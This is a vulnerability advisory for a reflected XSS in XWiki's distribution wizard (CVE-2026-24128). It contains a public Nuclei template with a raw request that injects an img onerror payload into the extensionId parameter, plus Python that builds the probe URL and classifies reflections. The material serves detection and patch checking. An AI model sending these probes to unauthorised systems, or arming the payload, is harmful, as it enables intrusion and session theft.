CVE-2026-24128: XWiki Platform Distribution Flavor Main - Cross-Site Scripting

Date: 2026-02-03 | Affected software: unknown | PoC: public

Vulnerability description

XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS, CWE-79): the value of the extensionId request parameter is reflected into the distribution wizard page (xpage=distribution, extensionSection=progress) without HTML escaping. An unauthenticated attacker who gets a victim to open a crafted link has arbitrary JavaScript executed in the wiki's origin with the victim's privileges, which is enough for session hijacking or for performing actions in the wiki as the victim. Exploitation needs no privileges but does need user interaction, which is why CVSS 3.1 scores it 6.1 (medium).

PoC code [public]

id: CVE-2026-24128

info:
  name: XWiki Platform Distribution Flavor Main - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-23462
    - https://nvd.nist.gov/vuln/detail/CVE-2026-24128
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-24128
    epss-score: 0.0002
    epss-percentile: 0.04545
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: XWiki
    product: xwiki-platform-distribution-flavor-main
    shodan-query: html:"data-xwiki-reference"
  tags: cve,cve2026,xwiki,xss

http:
  - raw:
      - |
        GET /xwiki/bin/view/XWiki/Main?xpage=distribution&extensionSection=progress&extensionId=org.xwiki.platform%3Axwiki-platform-distribution-flavor-mainwikia7jdh%3Cimg%20src%3Da%20onerror%3Dalert(document.domain)%3Eh5kturc1hk&extensionVersion=17.6.0&extensionNamespace=wiki%3Axwiki&extensionAction=install HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>"
          - "xwiki.extension.job"
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205db0b5491c2fb10e3ac074e63070f063b076384f14cb9c562459b103634f252802210087c0508287b7a36c0a3cc5e8bc56753c6081f8b2cecab1b640a150df90bdf0ce:922c64590222798bb761d5b6d8e72950
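The template above matches on the literal payload string in the response body, which cannot tell a reflection of this request apart from the same string appearing for any other reason. As an added example, not part of the advisory and not XWiki's own code, the Python below builds the same probe with a per-request marker (the template's random strings a7jdh and h5kturc1hk play that role) and classifies a response as raw reflection, HTML-encoded reflection, stripped, truncated or absent. The render_vulnerable and render_fixed functions are a constructed stand-in for the page output so the check runs offline; they are not XWiki's Velocity template. The host https://wiki.example is a placeholder.

```python
"""Added example for CVE-2026-24128 (not part of the advisory or of XWiki).

Builds the reflected-XSS probe used by the Nuclei template with a per-request
marker, and classifies a response body as raw reflection (vulnerable),
HTML-encoded reflection (fixed), stripped, truncated, or absent. The render_*
functions are a constructed simulation of the page output so the check runs
offline; they are not XWiki's template code.
"""
import html
import re
import secrets
from urllib.parse import urlencode

# Request layout taken from the Nuclei template.
DISTRIBUTION_PAGE = "/xwiki/bin/view/XWiki/Main"
FLAVOR_ID = "org.xwiki.platform:xwiki-platform-distribution-flavor-main"
PROBE_TAG = "<img src=a onerror=alert(document.domain)>"


def new_marker() -> str:
    """Random token that ties a reflection to this specific request."""
    return secrets.token_hex(4)


def make_payload(marker: str) -> str:
    """extensionId value: the real flavor id, then the probe bracketed by the
    marker on both sides, mirroring the template's random strings."""
    return f"{FLAVOR_ID}{marker}{PROBE_TAG}{marker}"


def build_poc_url(base_url: str, marker: str) -> str:
    """Full probe URL; base_url is a placeholder supplied by the caller."""
    params = {
        "xpage": "distribution",
        "extensionSection": "progress",
        "extensionId": make_payload(marker),
        "extensionVersion": "17.6.0",
        "extensionNamespace": "wiki:xwiki",
        "extensionAction": "install",
    }
    return base_url.rstrip("/") + DISTRIBUTION_PAGE + "?" + urlencode(params)


def classify_reflection(body: str, marker: str) -> str:
    """Decide what happened to the probe in a response body.

    'raw'       live <img ... onerror=...> between the two markers: vulnerable
    'encoded'   markers present but the tag was HTML-escaped: not exploitable
    'stripped'  markers present, tag neither live nor escaped (filtered out)
    'truncated' only one marker survived (value cut or partially reflected)
    'absent'    marker never reflected
    """
    if marker not in body:
        return "absent"
    m = re.search(re.escape(marker) + r"(.*?)" + re.escape(marker), body, re.S)
    if not m:
        return "truncated"
    between = m.group(1)
    if re.search(r"<img\s[^>]*onerror\s*=", between, re.I):
        return "raw"
    if "&lt;img" in between:
        return "encoded"
    return "stripped"


# --- Constructed simulations of the page output (not XWiki's Velocity code) ---

def render_vulnerable(extension_id: str) -> str:
    """Pre-fix behaviour: the parameter is concatenated into HTML unchanged."""
    return ('<div class="xwiki-extension-job" data-job="xwiki.extension.job">'
            f'Installing {extension_id}</div>')


def render_fixed(extension_id: str) -> str:
    """Hardened behaviour: the parameter is HTML-escaped before output."""
    return ('<div class="xwiki-extension-job" data-job="xwiki.extension.job">'
            f'Installing {html.escape(extension_id, quote=True)}</div>')


def probe_offline(marker: str) -> dict:
    """Run the classifier over both simulated responses."""
    payload = make_payload(marker)
    return {
        "vulnerable": classify_reflection(render_vulnerable(payload), marker),
        "fixed": classify_reflection(render_fixed(payload), marker),
    }


if __name__ == "__main__":
    marker = new_marker()
    print(build_poc_url("https://wiki.example", marker))   # placeholder host
    print(probe_offline(marker))
```

Against a live target, fetch the URL from build_poc_url with redirects followed (the template sets redirects: true), confirm the body is text/html and contains "xwiki.extension.job" so the right page was rendered, and count only a "raw" classification as a hit; "encoded" is the expected result on a fixed instance.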